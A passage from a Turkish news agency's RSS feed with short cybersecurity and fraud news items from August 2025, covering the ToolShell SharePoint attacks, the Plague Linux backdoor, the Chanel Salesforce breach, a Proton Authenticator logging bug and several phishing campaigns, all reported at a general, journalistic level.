<p style="margin: 0;">Geçmişte de benzer tehditlerle karşılaşan Android ekibi, Mart ayında Sırp yetkililerin el konulan cihazları açmak için kullandığı iki sıfırıncı gün açığını kapatmıştı. Kasım 2024’te ise NoviSpy casus yazılım saldırılarında kullanılan başka bir Android sıfırıncı gün açığı giderilmişti.</p>
<p style="margin: 14px 0 0 0; font-size: 14px; color: #6b7280;">Kaynak: <strong>CUMHA - CUMHUR HABER AJANSI</strong></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Microsoft, Zero Day Quest ödül havuzunu 5 milyon dolara yükseltti</title>
            <link>https://cumha.com.tr/microsoft-zero-day-quest-oedul-havuzunu-5-milyon-dolara-yukseltti</link>
            <guid>https://cumha.com.tr/microsoft-zero-day-quest-oedul-havuzunu-5-milyon-dolara-yukseltti</guid>
            <description><![CDATA[ Microsoft, bulut ve yapay zeka ürünlerindeki güvenlik açıklarını tespit etmeye yönelik Zero Day Quest yarışmasının 2025 ödül havuzunu 5 milyon dolara çıkardı. Araştırmacılar, kritik açıklar için yüzde 50 ödül çarpanı kazanabilecek ve seçilen katılımcılar 2026’da Redmond’daki canlı hacking etkinliğine davet edilecek. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68967f0c87e7c.webp" length="54518" type="image/webp"/>
            
            <pubDate>Sat, 09 Aug 2025 01:28:35 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Zero Day Quest yarışması hangi güvenlik alanlarına odaklanıyor, kritik açıklar için ödül sistemi nasıl çalışıyor, etkinlik kapsamında hangi eğitimler verilecek, yarışma Microsoft’un güvenlik stratejisinde nasıl bir rol oynuyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p style="margin: 0 0 14px 0;"><strong>Microsoft</strong>, bu yıl düzenlenecek <strong>Zero Day Quest</strong> güvenlik araştırma yarışmasında toplam ödül havuzunu <strong>5 milyon dolar</strong>a yükselttiğini açıkladı. Şirket, etkinliği “tarihin en büyük hacking organizasyonu” olarak tanımlıyor.</p>
<p style="margin: 0 0 14px 0;">Geçen yıl 4 milyon dolar ödül havuzuyla gerçekleştirilen yarışmada, bulut ve yapay zeka ürünlerindeki güvenlik açıklarını bulan araştırmacılara toplam <strong>1,6 milyon dolar</strong> ödül dağıtılmış, 600’den fazla güvenlik açığı bildirimi alınmıştı.</p>
<p style="margin: 0 0 14px 0;">Bu yıl <strong>4 Ağustos - 4 Ekim 2025</strong> tarihleri arasında başvurular kabul edilecek. Yarışma, tüm güvenlik araştırmacılarına açık olacak ve kritik açıklar ile yüksek etkili senaryolar için yüzde 50’ye kadar ödül çarpanı uygulanacak. Öncelikli ürünler arasında <strong>Microsoft Azure</strong>, <strong>Copilot</strong>, <strong>Dynamics 365</strong>, <strong>Power Platform</strong>, <strong>Identity</strong> ve <strong>M365</strong> yer alıyor.</p>
<p style="margin: 0 0 14px 0;">Başarılı araştırmacılar, 2026 baharında Microsoft’un Redmond kampüsünde düzenlenecek canlı hacking etkinliğine davet edilecek. Etkinlikte katılımcılar, <strong>Microsoft Security Response Center</strong> ve ürün ekipleriyle doğrudan çalışacak. Yarışma sürecinde Microsoft’un <em>AI Red Team</em>, MSRC ve Dynamics ekipleri, yapay zeka sistem testleri, bug bounty programları ve güvenlik araştırma yöntemleri konularında eğitimler verecek.</p>
<p style="margin: 0 0 14px 0;">Zero Day Quest, Microsoft’un 2023’te başlattığı <strong>Secure Future Initiative (SFI)</strong> kapsamında düzenleniyor. SFI, şirketin güvenlik kültürünü geliştirmeyi ve “varsayılan olarak güvenli” yaklaşımını benimsemeyi hedefliyor. Microsoft, yarışmadan elde edilen bulguların bulut ve yapay zeka güvenliğini artırmak için şirket genelinde paylaşılacağını belirtti.</p>
<p style="margin: 0;">Şirket ayrıca <strong>.NET</strong> ve <strong>ASP.NET Core</strong> açıkları için maksimum ödülü 40 bin dolara çıkarırken, Power Platform ve Dynamics 365 AI açıkları ile Microsoft Copilot güvenlik hataları için de ödülleri artırdı. Copilot açıkları için tüm bildirimlerde yüzde 100 ödül çarpanı uygulanmaya başlandı.</p>
<p style="margin: 14px 0 0 0; font-size: 14px; color: #6b7280;">Kaynak: <strong>CUMHA - CUMHUR HABER AJANSI</strong></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Chanel, Salesforce tabanlı veri hırsızlığı saldırılarında hedef alınan son marka oldu</title>
            <link>https://cumha.com.tr/chanel-salesforce-tabanli-veri-hirsizligi-saldirilarinda-hedef-alinan-son-marka-oldu</link>
            <guid>https://cumha.com.tr/chanel-salesforce-tabanli-veri-hirsizligi-saldirilarinda-hedef-alinan-son-marka-oldu</guid>
            <description><![CDATA[ Fransız moda devi Chanel, ABD’deki müşteri iletişim bilgilerini içeren bir veritabanının yetkisiz erişim sonucu ele geçirildiğini açıkladı. Saldırının, ShinyHunters grubunun yürüttüğü ve Salesforce hesaplarını hedef alan sosyal mühendislik kampanyasının parçası olduğu belirtildi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68967f1e2ce82.webp" length="47212" type="image/webp"/>
            
            <pubDate>Sat, 09 Aug 2025 01:28:22 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Chanel veri ihlalinde hangi bilgiler ele geçirildi, saldırı Salesforce hesaplarına nasıl gerçekleştirildi, ShinyHunters grubu hangi yöntemleri kullanıyor, Salesforce müşterilerine hangi güvenlik önlemlerini öneriyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p style="margin: 0 0 14px 0;">Fransız lüks moda markası <strong>Chanel</strong>, ABD’deki müşterilerine ait iletişim bilgilerinin çalındığı bir veri ihlali yaşadığını doğruladı. Şirket, 25 Temmuz’da tespit edilen olayda, üçüncü taraf bir hizmet sağlayıcısında barındırılan veritabanına yetkisiz erişim sağlandığını açıkladı.</p>
<p style="margin: 0 0 14px 0;">Chanel’in açıklamasına göre, yalnızca müşteri hizmetleri merkeziyle iletişime geçen bazı kişilerin isim, e-posta adresi, posta adresi ve telefon numarası gibi bilgileri etkilendi. Şirket, başka hiçbir kişisel bilginin bu veritabanında bulunmadığını ve etkilenen müşterilerin bilgilendirildiğini belirtti.</p>
<p style="margin: 0 0 14px 0;"><em>BleepingComputer</em>’ın edindiği bilgilere göre, veriler Chanel’in <strong>Salesforce</strong> ortamından çalındı. Bu olay, <strong>ShinyHunters</strong> adlı fidye ve veri hırsızlığı grubunun yürüttüğü geniş çaplı Salesforce veri hırsızlığı saldırılarının bir parçası. <strong>Mandiant</strong>’ın raporuna göre, saldırganlar <em>vishing</em> (telefonla kimlik avı) yöntemleriyle çalışanlardan giriş bilgilerini alıyor veya kötü amaçlı bir OAuth uygulamasına erişim izni verdirerek Salesforce hesaplarına sızıyor.</p>
<p style="margin: 0 0 14px 0;">Erişim sağlandıktan sonra, saldırganlar müşteri veritabanlarını kopyalayıp şirketleri e-posta yoluyla fidye talepleriyle tehdit ediyor. <strong>Salesforce</strong>, kendi platformunda herhangi bir güvenlik açığı bulunmadığını ve ihlallerin tamamen sosyal mühendislik yoluyla müşteri hesaplarının ele geçirilmesinden kaynaklandığını vurguladı. Şirket, tüm kullanıcıları çok faktörlü kimlik doğrulama (MFA) kullanmaya, en az ayrıcalık ilkesini uygulamaya ve bağlı uygulamaları dikkatle yönetmeye çağırdı.</p>
<p style="margin: 0;"><strong>ShinyHunters</strong> grubunun saldırılarından etkilenen diğer markalar arasında <strong>Adidas</strong>, <strong>Qantas</strong>, <strong>Allianz Life</strong> ve <strong>LVMH</strong> bünyesindeki <strong>Louis Vuitton</strong>, <strong>Dior</strong> ile <strong>Tiffany &amp; Co.</strong> yer alıyor. Şu ana kadar çalınan verilerin kamuya sızdırılmadığı, şirketlerin e-posta ile tehdit edildiği bildirildi.</p>
<p style="margin: 14px 0 0 0; font-size: 14px; color: #6b7280;">Kaynak: <strong>CUMHA - CUMHUR HABER AJANSI</strong></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Proton, iOS Authenticator uygulamasında TOTP sırlarını açıkta kaydeden hatayı giderdi</title>
            <link>https://cumha.com.tr/proton-ios-authenticator-uygulamasinda-totp-sirlarini-acikta-kaydeden-hatayi-giderdi</link>
            <guid>https://cumha.com.tr/proton-ios-authenticator-uygulamasinda-totp-sirlarini-acikta-kaydeden-hatayi-giderdi</guid>
            <description><![CDATA[ Proton, yeni Authenticator uygulamasının iOS sürümünde, kullanıcıların çok faktörlü kimlik doğrulama (TOTP) sırlarını düz metin olarak günlük dosyalarına kaydeden bir hatayı düzeltti. Günlükler cihazda yerel olarak tutulsa da, paylaşıldığında hassas verilerin üçüncü kişilere sızma riski bulunuyordu. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68967f531b0bf.webp" length="50654" type="image/webp"/>
            
            <pubDate>Sat, 09 Aug 2025 01:28:16 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Proton Authenticator iOS sürümündeki hata nasıl ortaya çıktı, TOTP sırlarının günlüklerde kaydedilme nedeni neydi, güncelleme ile hangi değişiklikler yapıldı, kullanıcıların cihaz güvenliği neden kritik</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p style="margin: 0 0 14px 0;"><strong>Proton</strong>, geçen hafta kullanıma sunduğu yeni <strong>Authenticator</strong> uygulamasının iOS sürümünde tespit edilen bir güvenlik hatasını giderdi. Hata, uygulamanın günlük dosyalarında kullanıcıların çok faktörlü kimlik doğrulama (<em>TOTP</em>) sırlarını şifrelenmemiş şekilde kaydediyordu.</p>
<p style="margin: 0 0 14px 0;">Proton Authenticator, Windows, macOS, Linux, Android ve iOS’ta çalışan, ücretsiz ve bağımsız bir iki faktörlü kimlik doğrulama uygulaması olarak tasarlandı. Uygulama, web siteleri ve uygulamalara girişte tek kullanımlık kodlar üretmek için gerekli TOTP sırlarını saklıyor.</p>
<p style="margin: 0 0 14px 0;">Sorun, bir kullanıcının Reddit’te (daha sonra silinen) paylaşımıyla gündeme geldi. Kullanıcı, bazı 2FA girişlerinin kaybolduğunu fark edip hata raporu hazırlarken uygulama günlüklerinde tüm TOTP sırlarının açıkça göründüğünü keşfetti. Hatanın, iOS sürümünde TOTP girişine ait bilgilerin bir <code>params</code> değişkenine eklenmesi ve bu verilerin günlük kayıtlarına dahil edilmesinden kaynaklandığı belirlendi.</p>
<p style="margin: 0 0 14px 0;">Proton, hatayı doğrulayarak iOS uygulamasının <strong>1.1.1</strong> sürümüyle App Store’da yayımlanan güncellemede düzeltildiğini açıkladı. Şirket, sırların hiçbir zaman sunucuya şifrelenmemiş olarak iletilmediğini, tüm senkronizasyonun uçtan uca şifrelemeyle yapıldığını ve günlüklerin yalnızca cihazda tutulduğunu belirtti.</p>
<p style="margin: 0 0 14px 0;">Proton ayrıca, cihaz erişimi olan bir kişinin bu günlükleri görmese bile sırları elde edebileceğini, bu nedenle cihaz güvenliğinin kullanıcı sorumluluğunda olduğunu vurguladı. Uzaktan sömürülemeyen bu hata, günlük dosyalarının paylaşılması durumunda üçüncü taraflara erişim riski oluşturuyordu. Bu veriler başka bir kimlik doğrulayıcıya aktarılarak ilgili hesaplara giriş kodu üretilebilirdi.</p>
<p style="margin: 14px 0 0 0; font-size: 14px; color: #6b7280;">Kaynak: <strong>CUMHA - CUMHUR HABER AJANSI</strong></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Plague adlı yeni Linux zararlı yazılımı, SSH erişimini kalıcı ve görünmez şekilde sürdürüyor</title>
            <link>https://cumha.com.tr/plague-adli-yeni-linux-zararli-yazilimi-ssh-erisimini-kalici-ve-goerunmez-sekilde-surduruyor</link>
            <guid>https://cumha.com.tr/plague-adli-yeni-linux-zararli-yazilimi-ssh-erisimini-kalici-ve-goerunmez-sekilde-surduruyor</guid>
            <description><![CDATA[ Nextron Systems araştırmacıları, bir yıldan uzun süredir tespit edilmeden aktif olan “Plague” adlı Linux zararlı yazılımını ortaya çıkardı. Pluggable Authentication Module (PAM) üzerinden çalışan yazılım, katmanlı gizleme teknikleri ve ortam manipülasyonu ile tespit edilmekten kaçıyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68967f6fb84b6.webp" length="59228" type="image/webp"/>
            
            <pubDate>Sat, 09 Aug 2025 01:28:11 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Plague zararlı yazılımı Linux sistemlerde nasıl kalıcı hale geliyor, ortam manipülasyonu hangi yöntemlerle yapılıyor, antivirüs yazılımları neden tespit edemedi, yazılımın geliştirme sürecine dair hangi ipuçları bulundu</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p style="margin: 0 0 14px 0;">Linux sistemleri hedef alan ve <strong>“Plague”</strong> olarak adlandırılan yeni bir zararlı yazılımın, saldırganlara kalıcı <strong>SSH</strong> erişimi sağladığı ve kimlik doğrulamayı atlatabildiği belirlendi. <strong>Nextron Systems</strong> güvenlik araştırmacılarının tespitine göre, bu zararlı yazılım bir <em>Pluggable Authentication Module (PAM)</em> bileşeni olarak çalışıyor ve güvenlik araçlarını aşmak için gelişmiş gizleme yöntemleri kullanıyor.</p>
<p style="margin: 0 0 14px 0;">Plague, analiz ve tersine mühendislik girişimlerini engellemek için anti-debugging yeteneklerine sahip. Yazılım ayrıca sabitlenmiş parolalar üzerinden gizli erişim sağlıyor, saldırgan oturumlarının izlerini gizliyor, komut geçmişini <code>/dev/null</code> dizinine yönlendirerek kayıtların tutulmasını engelliyor ve SSH bağlantı bilgilerini sistem ortam değişkenlerinden siliyor.</p>
<p style="margin: 0 0 14px 0;">Araştırmacı <strong>Pierre-Henri Pezier</strong>, zararlı yazılımın kimlik doğrulama katmanına derinlemesine entegre olduğunu, sistem güncellemelerinden etkilenmediğini ve adli izler bırakmadığını belirtti. Çeşitli Linux dağıtımlarında farklı GCC sürümleriyle derlenmiş örnekler, yazılımın uzun süredir aktif olarak geliştirildiğini gösteriyor.</p>
<p style="margin: 0 0 14px 0;">Nextron Systems, son bir yılda VirusTotal’a yüklenen çok sayıda varyantın hiçbir antivirüs yazılımı tarafından zararlı olarak işaretlenmediğini, bu durumun saldırganların faaliyetlerini tespit edilmeden sürdürebildiğini ortaya koyduğunu bildirdi.</p>
<p style="margin: 0;">Mayıs ayında aynı şirket, PAM altyapısını kötüye kullanarak kimlik bilgilerini çalabilen, kimlik doğrulamayı atlayabilen ve kalıcı erişim sağlayabilen başka bir zararlı yazılım keşfetmişti.</p>
<p style="margin: 14px 0 0 0; font-size: 14px; color: #6b7280;">Kaynak: <strong>CUMHA - CUMHUR HABER AJANSI</strong></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Fidye yazılım çeteleri, 148 kurumu hedef alan Microsoft SharePoint saldırılarına dahil oldu</title>
            <link>https://cumha.com.tr/fidye-yazilim-ceteleri-148-kurumu-hedef-alan-microsoft-sharepoint-saldirilarina-dahil-oldu</link>
            <guid>https://cumha.com.tr/fidye-yazilim-ceteleri-148-kurumu-hedef-alan-microsoft-sharepoint-saldirilarina-dahil-oldu</guid>
            <description><![CDATA[ Palo Alto Networks Unit 42 araştırmacıları, Microsoft SharePoint sunucularını hedef alan “ToolShell” güvenlik açığı zincirine fidye yazılım gruplarının da katıldığını açıkladı. En az 148 kurumun etkilendiği kampanyada, 4L4MD4R adlı yeni bir fidye yazılımı tespit edildi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68967f9040855.webp" length="57038" type="image/webp"/>
            
            <pubDate>Sat, 09 Aug 2025 01:28:06 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>ToolShell güvenlik açığı zinciri hangi kurumları etkiledi, 4L4MD4R fidye yazılımı nasıl çalışıyor, saldırılarda hangi devlet destekli gruplar yer aldı, Microsoft SharePoint açıkları hangi yamalarla kapatıldı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p style="margin: 0 0 14px 0;"><strong>Microsoft SharePoint</strong> sunucularını hedef alan “<strong>ToolShell</strong>” güvenlik açığı zinciri, fidye yazılım çetelerinin de dahil olmasıyla daha geniş çaplı bir siber saldırı dalgasına dönüştü. <strong>Palo Alto Networks</strong>’e bağlı <strong>Unit 42</strong> ekibi, analizlerinde açık kaynak kodlu <em>Mauri870</em> tabanlı <strong>4L4MD4R</strong> fidye yazılımını tespit etti.</p>
<p style="margin: 0 0 14px 0;">4L4MD4R, 27 Temmuz’da bir zararlı yazılım yükleyicisinin tespit edilmesiyle ortaya çıktı. Bu yükleyici, fidye yazılımını <code>theinnovationfactory[.]it</code> alan adından indirerek çalıştırıyor. Yükleyicinin, hedef cihazlarda güvenlik izleme işlevlerini devre dışı bırakmak için tasarlanmış PowerShell komutları kullandığı belirlendi.</p>
<p style="margin: 0 0 14px 0;">Araştırmalara göre 4L4MD4R, <strong>GoLang</strong> ile yazılmış ve <strong>UPX</strong> ile paketlenmiş durumda. Çalıştırıldığında AES şifreli yükünü bellekte çözüyor, ayrılmış belleğe yüklüyor ve yeni bir iş parçacığında çalıştırıyor. Saldırı sonrası dosyaları şifreleyen zararlı yazılım, <strong>0,005 Bitcoin</strong> fidye talep ediyor ve şifrelenmiş dosyaların listesi ile fidye notlarını sistemde bırakıyor.</p>
<p style="margin: 0 0 14px 0;">Microsoft ve Google, ToolShell saldırılarını Çin merkezli tehdit aktörleriyle ilişkilendirdi. Microsoft, <strong>Linen Typhoon</strong>, <strong>Violet Typhoon</strong> ve <strong>Storm-2603</strong> olarak izlenen üç devlet destekli grubun güvenlik açıklarını istismar ettiğini açıkladı.</p>
<p style="margin: 0 0 14px 0;">Şimdiye kadar <strong>ABD Ulusal Nükleer Güvenlik İdaresi</strong>, <strong>Eğitim Bakanlığı</strong>, <strong>Florida Gelir İdaresi</strong>, <strong>Rhode Island Genel Kurulu</strong> ve Avrupa ile Orta Doğu’daki bazı devlet kurumlarının bu saldırılardan etkilendiği bildirildi.</p>
<p style="margin: 0 0 14px 0;">ToolShell saldırıları ilk olarak Hollanda merkezli <strong>Eye Security</strong> tarafından tespit edildi. Sıfırıncı gün açıkları <strong>CVE-2025-49706</strong> ve <strong>CVE-2025-49704</strong> üzerinden yürütülen saldırılar, 7 Temmuz’dan itibaren hükümet, telekom ve teknoloji kuruluşlarını hedef aldı. Microsoft, Temmuz 2025 güvenlik güncellemeleriyle bu açıkları kapattığını, ayrıca yamalanmış SharePoint sunucularını etkileyen iki yeni sıfırıncı gün açığı için <strong>CVE-2025-53770</strong> ve <strong>CVE-2025-53771</strong> kimliklerini atadığını duyurdu.</p>
<p style="margin: 0 0 14px 0;">Eye Security CTO’su <strong>Piet Kerkhofs</strong>, gerçek etkinin açıklanan rakamların üzerinde olduğunu, en az 400 sunucunun zararlı yazılımla enfekte edildiğini ve 148 kurumun uzun süreli olarak ihlal altında kalmış olabileceğini belirtti. <strong>ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA)</strong>, CVE-2025-53770 güvenlik açığını istismar edilen açıklar listesine ekleyerek federal kurumlara 24 saat içinde sistemlerini güvenceye almaları talimatını verdi.</p>
<p style="margin: 14px 0 0 0; font-size: 14px; color: #6b7280;">Kaynak: <strong>CUMHA - CUMHUR HABER AJANSI</strong></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Mozilla, eklenti geliştiricilerini hedef alan aktif kimlik avı saldırısına karşı uyardı</title>
            <link>https://cumha.com.tr/mozilla-eklenti-gelistiricilerini-hedef-alan-aktif-kimlik-avi-saldirisina-karsi-uyardi</link>
            <guid>https://cumha.com.tr/mozilla-eklenti-gelistiricilerini-hedef-alan-aktif-kimlik-avi-saldirisina-karsi-uyardi</guid>
            <description><![CDATA[ Mozilla, addons.mozilla.org (AMO) platformundaki geliştirici hesaplarını hedef alan kimlik avı kampanyası tespit etti. Sahte e-postalar, hesap erişimini korumak için güncelleme yapılması gerektiğini iddia ederek geliştiricileri oltalama sitelerine yönlendiriyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68967fbbe3eeb.webp" length="40242" type="image/webp"/>
            
            <pubDate>Sat, 09 Aug 2025 01:28:02 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Mozilla geliştirici hesapları nasıl hedef alınıyor, sahte e-postalar hangi yöntemle kullanıcıları yanıltıyor, geliştiriciler kimlik avına karşı nasıl önlem almalı, saldırının ölçeği hakkında hangi bilgiler biliniyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p style="margin: 0 0 14px 0;"><strong>Mozilla</strong>, resmi eklenti platformu <strong>addons.mozilla.org (AMO)</strong> üzerinde kayıtlı geliştiricilere yönelik aktif bir kimlik avı saldırısı tespit edildiğini duyurdu. Dünya genelinde milyonlarca kullanıcıya hizmet veren AMO, 60 binden fazla tarayıcı uzantısı ve yarım milyondan fazla tema barındırıyor.</p>
<p style="margin: 0 0 14px 0;">Şirketin açıklamasına göre saldırganlar, AMO ekibi adına sahte e-postalar göndererek geliştirici hesaplarının erişim haklarını korumak için güncelleme yapılması gerektiğini iddia ediyor. E-postalarda genellikle “Mozilla Eklenti hesabınızın geliştirici özelliklerine erişmeye devam etmesi için güncelleme gereklidir” şeklinde ifadeler yer alıyor.</p>
<p style="margin: 0 0 14px 0;">Mozilla, geliştiricilerin gelen e-postaların <code>mozilla.org</code>, <code>firefox.com</code>, <code>mozilla.com</code> veya bunların alt alan adlarından geldiğini doğrulamaları gerektiğini, SPF, DKIM ve DMARC gibi e-posta kimlik doğrulama kontrollerinin geçerli olup olmadığını kontrol etmelerini tavsiye etti. Şirket ayrıca, şüpheli e-postalardaki bağlantılara tıklanmaması ve giriş bilgilerinin yalnızca resmi Mozilla veya Firefox alan adlarında girilmesi gerektiğini vurguladı.</p>
<p style="margin: 0 0 14px 0;">Saldırıların ölçeği ve herhangi bir geliştirici hesabının ele geçirilip geçirilmediği henüz açıklanmadı. Ancak en az bir geliştiricinin saldırıya maruz kaldığını bildirdiği öğrenildi. Mozilla, yeni bilgiler ortaya çıktıkça güncelleme yapacağını belirtti.</p>
<p style="margin: 0;">Bu uyarı, geçen ay Mozilla Add-ons Operasyon ekibinin kripto para cüzdanlarını boşaltmaya yönelik kötü amaçlı Firefox uzantılarını engellemeyi hedefleyen yeni bir güvenlik özelliğini duyurmasının ardından geldi. Mozilla Add-ons Operasyon Müdürü <strong>Andreas Wagner</strong>, son yıllarda yüzlerce kötü amaçlı eklentiyi kaldırdıklarını ve siber saldırganların geçen yıl bu yöntemle <strong>494 milyon dolar</strong> değerinde kripto para çaldığını açıkladı.</p>
<p style="margin: 14px 0 0 0; font-size: 14px; color: #6b7280;">Kaynak: <strong>CUMHA - CUMHUR HABER AJANSI</strong></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Siber saldırganlar link-wrapping hizmetlerini kullanarak Microsoft 365 giriş bilgilerini hedef aldı</title>
            <link>https://cumha.com.tr/siber-saldirganlar-link-wrapping-hizmetlerini-kullanarak-microsoft-365-giris-bilgilerini-hedef-aldi</link>
            <guid>https://cumha.com.tr/siber-saldirganlar-link-wrapping-hizmetlerini-kullanarak-microsoft-365-giris-bilgilerini-hedef-aldi</guid>
            <description><![CDATA[ Haziran ve Temmuz aylarında yürütülen kampanyalarda, saldırganların Proofpoint ve Intermedia gibi güvenilir teknoloji firmalarının bağlantı sarmalama (link-wrapping) hizmetlerini kötüye kullanarak Microsoft 365 kimlik bilgilerini çaldığı tespit edildi. Cloudflare araştırmacıları, saldırganların sahte Teams ve e-posta bildirimleriyle kullanıcıları oltalama sayfalarına yönlendirdiğini açıkladı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68968029865b0.webp" length="47764" type="image/webp"/>
            
            <pubDate>Sat, 09 Aug 2025 01:27:53 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Microsoft 365 kullanıcıları hangi yeni oltalama yöntemiyle hedef alındı, link-wrapping hizmetleri nasıl kötüye kullanıldı, sahte bildirimler hangi içeriklerle gönderildi, saldırganlar kimlik bilgilerini hangi yolla topladı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p style="margin: 0 0 14px 0;">Haziran ve Temmuz 2025 döneminde gerçekleştirilen siber saldırılarda, bir tehdit aktörünün güvenilir teknoloji şirketlerine ait bağlantı sarmalama (<em>link-wrapping</em>) hizmetlerini kötüye kullanarak <strong>Microsoft 365</strong> kullanıcılarını hedef aldığı belirlendi.</p>
<p style="margin: 0 0 14px 0;"><strong>Cloudflare Email Security</strong> ekibinin tespitlerine göre, saldırganlar <strong>Proofpoint</strong> ve <strong>Intermedia</strong> tarafından korunan e-posta hesaplarını ele geçirerek, zararlı bağlantıları bu hizmetlerin güvenli görünen URL’leri aracılığıyla iletti. Bağlantılar, zincirleme yönlendirmeler ve URL kısaltma servisleriyle gizlenerek kullanıcıların oltalama sitelerine ulaşması sağlandı.</p>
<p style="margin: 0 0 14px 0;">Araştırmacılar, saldırıların sahte sesli mesaj bildirimleri veya <strong>Microsoft Teams</strong> üzerinde paylaşılan belgeler gibi görünümlerle yürütüldüğünü aktardı. Yönlendirme zincirinin sonunda, kullanıcıların giriş bilgilerini ele geçirmek için tasarlanmış <strong>Microsoft Office 365</strong> oltalama sayfaları yer aldı.</p>
<p style="margin: 0 0 14px 0;"><strong>Intermedia</strong> hizmetinin kötüye kullanıldığı vakalarda ise saldırganlar, “Zix” güvenli mesaj bildirimleri veya yeni bir Teams mesajı bildirimi gibi e-postalar gönderdi. Bu e-postalarda yer alan ve Intermedia tarafından sarılmış görünen bağlantılar, <strong>Constant Contact</strong> platformu üzerinden barındırılan oltalama sayfalarına yönlendirdi.</p>
<p style="margin: 0;"><strong>Cloudflare</strong>, meşru görünen bağlantıların saldırı başarısını artırdığını, link-wrapping özelliğinin bu şekilde istismar edilmesinin ise oltalama yöntemlerinde yeni bir gelişme olduğunu vurguladı.</p>
<p style="margin: 14px 0 0 0; font-size: 14px; color: #6b7280;">Kaynak: <strong>CUMHA - CUMHUR HABER AJANSI</strong></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Kayseri Büyükşehir’den Dolandırıcılık Uyarısı: Yardım Başvuruları Sadece Resmî Siteden Yapılıyor</title>
            <link>https://cumha.com.tr/kayseri-buyuksehirden-dolandiricilik-uyarisi-yardim-basvurulari-sadece-resmi-siteden-yapiliyor</link>
            <guid>https://cumha.com.tr/kayseri-buyuksehirden-dolandiricilik-uyarisi-yardim-basvurulari-sadece-resmi-siteden-yapiliyor</guid>
            <description><![CDATA[ Kayseri Büyükşehir Belediyesi, kırtasiye ve beslenme yardımı başvurularıyla ilgili dolandırıcılık girişimlerine karşı vatandaşları uyardı. Yardım başvurularının yalnızca belediyenin resmi internet sitesi www.kayseri.bel.tr üzerinden yapılabileceği açıklandı. Sahte form ve mesajlara karşı dikkatli olunması istendi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_688d47b8c9df3.webp" length="93082" type="image/webp"/>
            
            <pubDate>Sat, 02 Aug 2025 02:03:54 +0300</pubDate>
            <dc:creator>Ayça Gülü</dc:creator>
            <media:keywords>Yardım başvurusu dolandırıcılığı nasıl yapılıyor, resmi başvurular hangi siteden yapılıyor, hangi bilgilere dikkat edilmeli, dolandırıcılık şüphesi olan durumlarda nereye başvurulmalı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="446" data-end="812">Kayseri Büyükşehir Belediyesi, 2025-2026 eğitim-öğretim yılı kapsamında yapılacak kırtasiye ve beslenme yardımı başvurularını fırsata çevirmeye çalışan dolandırıcılara karşı kamuoyuna uyarıda bulundu. Belediyeden yapılan açıklamada, vatandaşlardan kişisel bilgi isteyen sahte kişiler ve kurumlar konusunda dikkatli olunması gerektiği vurgulandı.</p>
<p data-start="814" data-end="1119">Açıklamaya göre, bazı art niyetli kişilerin yardım başvurusu bahanesiyle vatandaşlardan kimlik ve banka bilgileri talep ettiği, sahte formlar aracılığıyla hesap açtırmaya çalıştıkları belirlendi. Bu girişimlerin dolandırıcılık amacı taşıdığı ve resmi kurumlarla hiçbir bağlantısının olmadığı ifade edildi.</p>
<p data-start="1121" data-end="1406">Başvuruların sadece<span> </span><a data-start="1141" data-end="1159" rel="noopener" target="_new" class="" href="http://www.kayseri.bel.tr/">www.kayseri.bel.tr</a><span> </span>adresi üzerinden yapılabileceği hatırlatıldı. İhtiyaç sahibi vatandaşlar, internet sitesindeki “Online Hizmetler” menüsünde yer alan “Kırtasiye Yardımı” bölümü üzerinden 1 Ağustos – 17 Ağustos 2025 tarihleri arasında başvuru gerçekleştirebilecek.</p>
<p data-start="1408" data-end="1655">Belediye, vatandaşların telefon, kısa mesaj veya sosyal medya yoluyla yapılan yönlendirmelere itibar etmemeleri gerektiğini belirtti. Şüpheli durumlarla karşılaşılması halinde ise vakit kaybetmeden emniyet birimlerine başvurulması çağrısı yapıldı.</p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Lenovo, UEFI sistemlerinde Secure Boot'u atlatmaya yol açan kritik BIOS açıkları için güncelleme yayımladı</title>
            <link>https://cumha.com.tr/lenovo-uefi-sistemlerinde-secure-bootu-atlatmaya-yol-acan-kritik-bios-aciklari-icin-guncelleme-yayimladi</link>
            <guid>https://cumha.com.tr/lenovo-uefi-sistemlerinde-secure-bootu-atlatmaya-yol-acan-kritik-bios-aciklari-icin-guncelleme-yayimladi</guid>
